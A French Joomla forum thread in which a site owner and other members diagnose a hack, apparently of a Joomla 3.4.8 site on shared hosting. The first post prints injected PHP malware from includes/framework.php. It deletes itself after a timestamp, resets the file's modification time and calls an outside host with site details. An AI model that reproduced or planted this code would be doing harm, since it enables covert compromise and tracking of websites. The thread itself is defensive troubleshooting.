piratage joomla suite faille dans fichier includes/framework.php.

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] piratage joomla suite faille dans fichier includes/framework.php.

    Bonjour
    je suis sur l'hébergeur celeonet qui vient de me dire que mon site et d'autres ont été piratés suite à une faille joomla dans le fichier /includes/framework.php
    je cite:
    Le fichier /ap1510/includes/framework.php inclut, dans une fonction rajoutée à la fin du fichier, un appel vers une URL qui ne répond pas, et l'erreur de timeout est donc causée par cela.
    C'est un piratage que nous avons constaté plusieurs fois cette semaine, exploitant une faille de Joomla.

    effectivement voici les lignes ajoutées en fin de fichier
    check_meta();
    function check_meta(){
    $jp = __FILE__;
    $jptime = filemtime($jp);

    if(time() >= 1456727708){
    $jp_c = file_get_contents($jp);
    if($t = @strpos($jp_c,"check_meta();")) {
    $contentp = substr($jp_c,0,$t);
    if(@file_put_contents($jp, $contentp)){
    @touch($jp,$jptime);
    }
    }
    }
    @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php");
    }

    Bien sur on peut retirer les lignes mais rien n’empêchent les c....... qui n'ont rien d'autres à f...... de les remettre.
    y a t'il une version prévue prochainement pour corriger cette faille ou au moins un fichier pour palier le pb

    merci
    Obibi Kenowan
    (La Force n'est pas toujours avec moi !)
    Etienne Audfray Sculpteur http://www.audfray.com
    Armand Petersen Sculpteur http://www.armand-petersen.fr

  • #2
    Re : piratage joomla suite faille dans fichier includes/framework.php.

    Celeonet indique également que ces fichiers auraient été modifiés

    2016-02-22 07:31:02.358702662 +0100 ./includes/framework.php
    2016-02-23 08:37:49.952701926 +0100 ./modules/mod_feed/tmpl/mod_feed.php
    2016-02-23 08:37:49.967702541 +0100 ./components/com_content/helpers/helpers.php
    2016-02-24 19:04:29.877702081 +0100 ./cache/widgetkit/widgetkit-b0f37047.css
    2016-02-24 19:04:30.022702830 +0100 ./cache/widgetkit/widgetkit-be673286.js
    2016-02-24 19:05:01.633702694 +0100 ./configuration.php
    2016-02-25 09:50:37.670702954 +0100 ./logs/error.php
    Obibi Kenowan
    (La Force n'est pas toujours avec moi !)
    Etienne Audfray Sculpteur http://www.audfray.com
    Armand Petersen Sculpteur http://www.armand-petersen.fr

    Commentaire


    • #3
      Re : piratage joomla suite faille dans fichier includes/framework.php.

      Le même code a été signalé ce jour par un autre membre, sur un site 1.5, apparaissant sur le site même.
      J'ai donc quelques doutes sur la notion de "faille Joomla!" concernant ce fichier framework.php, pensant plutôt à la simple utilisation de ce fichier par les pirates.
      Attendons l'avis des pros de la sécurité.
      "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
      MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

      Commentaire


      • #4
        Re : piratage joomla suite faille dans fichier includes/framework.php.

        Bonjour,

        Je peux assurer que je viens de faire le test à savoir supprimer les dernières lignes et le site refonctionne parfaitement
        Obibi Kenowan
        (La Force n'est pas toujours avec moi !)
        Etienne Audfray Sculpteur http://www.audfray.com
        Armand Petersen Sculpteur http://www.armand-petersen.fr

        Commentaire


        • #5
          Re : piratage joomla suite faille dans fichier includes/framework.php.

          Ce qui ne veut pas dire qu'il s'agit d'une faille de Joomla! portant sur ce fichier (d'autant que d'autres t'ont été signalés comme également touchés).
          Tu as certainement un fichier caché quelque part qui régénère ce code.
          "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
          MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

          Commentaire


          • #6
            Re : piratage joomla suite faille dans fichier includes/framework.php.

            Bonjour

            Ton hébergeur peut-il ne pas crier au loup mais donner un peu plus d'éléments factuels ?

            "Mon PC contient un virus; c'est la faute à Windows", c'est un peu simpliste non ?

            Quelle est ta version de Joomla ? Version de php ? Est-ce que tu utilises des mots de passe fort ? As-tu des extensions à jour ou qui n'ont plus été maintenues depuis longtemps ? etc.

            Je ne puis que te proposer de restaurer une version propre de ton site ou de le nettoyer...
            Christophe (cavo789)
            Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
            Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

            Commentaire


            • #7
              Re : piratage joomla suite faille dans fichier includes/framework.php.

              Bonjour.
              ma version de joomla a toujours été la dernière et mise à jour au fil de l'eau
              php 5.6

              Ce que je dis c'est que le 20/01/2016 j'ai transmis un site joomla sur celeonet avec le dernière version de l'époque qui a fonctionné parfaitement jusqu'à hier où je me suis aperçu que mon site n'était plus accessible, qu'il bouclait pour finir par le message:
              Gateway Time-out
              The gateway did not receive a timely response from the upstream server or application.
              Apache Server at www.audfray.com Port 80

              j'ai donc contacté celeonet qui m'a répondu ce que j'ai indiqué dans mon 1er message

              J'ai regardé ce matin en local le fichier ../includes/framework.php que j'ai envoyé à l'époque et qui contient 104 lignes et qui se terminent par
              // System profiler
              if (JDEBUG)
              {
              $_PROFILER = JProfiler::getInstance('Application');
              }

              Ensuite j'ai regardé dans le fichier se trouvant sur celeonet et effectivement des lignes supplémentaires y figurent (celles que j'ai indiqué dans mon message précédent)
              CE N'EST PAS MOI QUI LES AI AJOUTE A LA MAIN

              J'ai supprimé ces lignes en renvoyant le fichier original joomla de framework et le site refonctionne correctement.

              Donc quand celeonet indique "C'est un piratage que nous avons constaté plusieurs fois cette semaine, exploitant une faille de Joomla ", qu'ils en donnent la raison, qu'elle s'avère exacte, on peut peut-être regarder ce qu'ils disent.

              Donc avant de m'agresser et de me demander de RESTAURER UN SITE PROPRE est-ce que vous avez au moins vérifier votre fichier framework.

              Maintenant moi je vous ai transmis cette info pour vous aider vous la prenez ou pas à vous de voir.

              Et puis le plus simple vous prenez contact avec celeonet (08.99.70.63.65 ) et vous discutez entre spécialistes ça ira plus vite.

              Cordialement.
              Obibi Kenowan
              (La Force n'est pas toujours avec moi !)
              Etienne Audfray Sculpteur http://www.audfray.com
              Armand Petersen Sculpteur http://www.armand-petersen.fr

              Commentaire


              • #8
                Re : piratage joomla suite faille dans fichier includes/framework.php.

                @ObibiKenowan : si le message que j'ai écris plus haut t'a choqué / heurté / ... désolé, ce n'était pas le but. Peut-être le style de mon message était défaillant reste que sur le contenu, je ne dirai pas autre chose.

                C'est tellement simple d'incriminer "C'est la faute à ...".

                Je n'insinue pas que tu ais ajouté ces lignes et je ne nie pas le hack; je réfute juste "C'est la faute à Joomla" parce que cela pourrait, peut-être, pourquoi pas être la faute à Voltaire aussi.

                Si Celeonet a trouvé une faille dans Joomla dernière version (tu ne dis pas si tu es en J1.5 dernière version, 2.5 ou 3.4.8) et si c'est 1.5/2.5 tu ne dis pas non plus si tu as mis à jour le fichier session.php publié le 24 décembre.

                Donc, si Celeonet a trouvé une faille dans Joomla 3.4.8, si l'hébergeur peut isoler la faille, alors les utilisateurs de Joomla lui seront reconnaissant de prendre contact avec l'équipe adhoc https://developer.joomla.org/contact-security-team.html

                Pour ton problème Obibi Kenowan : soit tu as une bestiole ailleurs sur ton site qui a causé l'injection de code d'où ma proposition de remonter un site qui était propre soit, on peut encore imaginer "C'est la faute à Celeonet" qui n'isolerait pas des sites hébergés sur le même serveur. On pourrait aussi l'imaginer non? puisque, comme par hasard, ils ont constaté ce hack sur plusieurs sites sur leur propre serveur. Points communs ? Joomla et ... Celeonet.

                [EDIT] Je me relis et je préfère préciser que, ci-dessus, c'était plus un clin d'oeil qu'autre chose : en principe, un hébergeur isole, strictement, chaque client et donc, le site du client A ne peut pas aller contaminer ceux du client B. [/EDIT]

                Je ne veux pas être agressif; ne vois pas ma réaction comme cela.

                Je te souhaite que ton site est maintenant sain et qu'il ne connaîtra plus d'injection de code.
                Dernière édition par cavo789 à 26/02/2016, 16h39
                Christophe (cavo789)
                Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                Commentaire


                • #9
                  Re : piratage joomla suite faille dans fichier includes/framework.php.

                  Bonjour

                  J'ai 3 sites chez Celeonet, je n'ai rien reçu (pour l'instant).

                  Commentaire


                  • #10
                    Re : piratage joomla suite faille dans fichier includes/framework.php.

                    Bonjour,

                    Comme les autres, utilisant Joomla! depuis longtemps, je n'ai jamais eu ce genre d'intrusion (ni avec J!3.4.8, ni avec les précédentes).

                    Par contre, il faut savoir que TOUTES les versions de PHP avant PHP 5.4.45, 5.5.29, 5.6.13 ont une faille grave dans les méthodes de sérialiasation/désérialisation. https://bugs.php.net/bug.php?id=70219

                    La version de Joomla!3.4.8 a justement modifié sa gestion de sessions pour être moins sensible à ce bug. Mais, en environnement mutualisé, avec une version de PHP antérieure à celles citées, il suffit d'une intrusion via un autre site hébergé, pas nécessairement Joomla! (ou alors un Joomla! pas à jour), mais WordPress, Coppermine, ou tout autre CMS ou applicatif utilisant la gestion native des sessions PHP, pour qu'un simple script injecté en session puisse altérer de manière aléatoire d'autres sites.

                    La faille ne provient pas de Joomla! lui-même, mais soit d'une extension tierce pas à jour, soit d'une version de PHP non mise à jour.
                    Pas de demande de support par MP.
                    S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                    Commentaire


                    • #11
                      Re : piratage joomla suite faille dans fichier includes/framework.php.

                      Envoyé par jisse03 Voir le message
                      il suffit d'une intrusion via un autre site hébergé, pas nécessairement Joomla! (ou alors un Joomla! pas à jour), mais WordPress, Coppermine, ou tout autre CMS ou applicatif utilisant la gestion native des sessions PHP, pour qu'un simple script injecté en session puisse altérer de manière aléatoire d'autres sites.
                      Oui, c'est pour cela que je parlais d'isolation des utilisateurs et des sites. J'ai quand même des doutes qu'aujourd'hui, avec des hébergeurs sérieux, cela puisse encore être le cas càd qu'un site d'un utilisateur A puis venir contaminer le site d'un autre utilisateur.

                      Mais oui, le site 1 de l'utilisateur A peut venir contaminer le site 2 du même utilisateur, ça, c'est bien plus courant et bien plus aisé à faire en php.
                      Christophe (cavo789)
                      Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                      Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                      Commentaire


                      • #12
                        Re : piratage joomla suite faille dans fichier includes/framework.php.

                        Bonjour.

                        Déjà pour situer. En local j'utilise WampServer Version 2.5 (Apache : 2.4.9 MySQL : 5.6.17 PHP : 5.5.12 PHPMyAdmin : 4.1.14 SqlBuddy : 1.3.3 XDebug : 2.2.5)
                        mon site en local est en joomla 3.4.8.

                        Quand je lance mon site en local j'ai le message
                        ----------------
                        ( ! ) Notice: Undefined index: HTTP_X_FORWARDED_FOR in C:\wamp\www\ap1602\includes\framework.php on line 13
                        Call Stack
                        # Time Memory Function Location
                        1 0.0000 138976 {main}( ) ..\index.php:0
                        2 0.0010 155744 require_once( 'C:\wamp\www\ap1602\includes\framework.php' ) ..\index.php:36
                        ---------------
                        la ligne 13 est la suivante

                        if(preg_match('!O:[0-9]+:"!iUs', $_SERVER['HTTP_USER_AGENT']) || preg_match('!O:[0-9]+:"!iUs', $_SERVER['HTTP_X_FORWARDED_FOR'])) die();

                        Je signale ce message car il concerne le fameux fichier /include/framework qui faisait planter mon site hier à cause de lignes insérées à la fin.

                        Je répète je ne connais rien à la programmation et donc les infos que je remonte n'ont peut-être aucun rapport avec le problème. c'est juste pour aider au cas où .
                        Obibi Kenowan
                        (La Force n'est pas toujours avec moi !)
                        Etienne Audfray Sculpteur http://www.audfray.com
                        Armand Petersen Sculpteur http://www.armand-petersen.fr

                        Commentaire


                        • #13
                          Re : piratage joomla suite faille dans fichier includes/framework.php.

                          Ton fichier local a été piraté : sur le fichier standard, la ligne 13 est vide.
                          "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
                          MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

                          Commentaire


                          • #14
                            Re : piratage joomla suite faille dans fichier includes/framework.php.

                            Bonjour.

                            exact. je viens de récupérer un joomla 3.4.8 et cette ligne n'existe pas.

                            sur la bonne version on a:

                            defined('_JEXEC') or die;

                            // Joomla system checks.
                            @ini_set('magic_quotes_runtime', 0);


                            sur la version piraté on a
                            defined('_JEXEC') or die;



                            if(preg_match('!O:[0-9]+:"!iUs', $_SERVER['HTTP_USER_AGENT']) || preg_match('!O:[0-9]+:"!iUs', $_SERVER['HTTP_X_FORWARDED_FOR'])) die();

                            // Joomla system checks.
                            @ini_set('magic_quotes_runtime', 0);

                            Ce site local est une sauvegarde de mon site en ligne.
                            J'ai donc récupéré ce fichier framework piraté (que se soit d'une faiblesse joomla ou pas ) se trouvant sur le serveur celeonet.

                            J'ai écrasé mon fichier framework par celui de joomla est tout est ok

                            Pour information:
                            Dans le repertoire includes de joomla il y a également le fichier defines.php
                            Dans celui récupéré du serveur j'ai également des lignes en plus en ligne 26/27

                            //Warning: CVE-2015-8562 security fix https://docs.joomla.org/Security_hot...a_EOL_versions
                            if(strpos(@implode($_SERVER),"O:")){die("Hacking attempt!");}

                            si cela vous dit quelque chose .....
                            Obibi Kenowan
                            (La Force n'est pas toujours avec moi !)
                            Etienne Audfray Sculpteur http://www.audfray.com
                            Armand Petersen Sculpteur http://www.armand-petersen.fr

                            Commentaire


                            • #15
                              Re : piratage joomla suite faille dans fichier includes/framework.php.

                              Envoyé par ObibiKenowan Voir le message
                              Bonjour.

                              Déjà pour situer. En local j'utilise WampServer Version 2.5 (Apache : 2.4.9 MySQL : 5.6.17 PHP : 5.5.12 PHPMyAdmin : 4.1.14 SqlBuddy : 1.3.3 XDebug : 2.2.5)
                              mon site en local est en joomla 3.4.8.

                              Quand je lance mon site en local j'ai le message
                              ----------------
                              ( ! ) Notice: Undefined index: HTTP_X_FORWARDED_FOR in C:\wamp\www\ap1602\includes\framework.php on line 13
                              Call Stack
                              # Time Memory Function Location
                              1 0.0000 138976 {main}( ) ..\index.php:0
                              2 0.0010 155744 require_once( 'C:\wamp\www\ap1602\includes\framework.php' ) ..\index.php:36
                              ---------------

                              Je répète je ne connais rien à la programmation et donc les infos que je remonte n'ont peut-être aucun rapport avec le problème. c'est juste pour aider au cas où .
                              Bonjour

                              Ton site local est-il la copie d ton site distant ? Est-ce cette version que tu as transféré en local ou le contraire ?
                              Si ton site local a été piraté, ça vaut dire qu'il est accessible de l'extérieur ou que tu utilises une extensions vérolée.
                              - Est-ce que tu as mis un mot de passe à l’utilisateur "root" ?
                              - Est-ce que Wampserver est interdit au connexions entrante ?

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X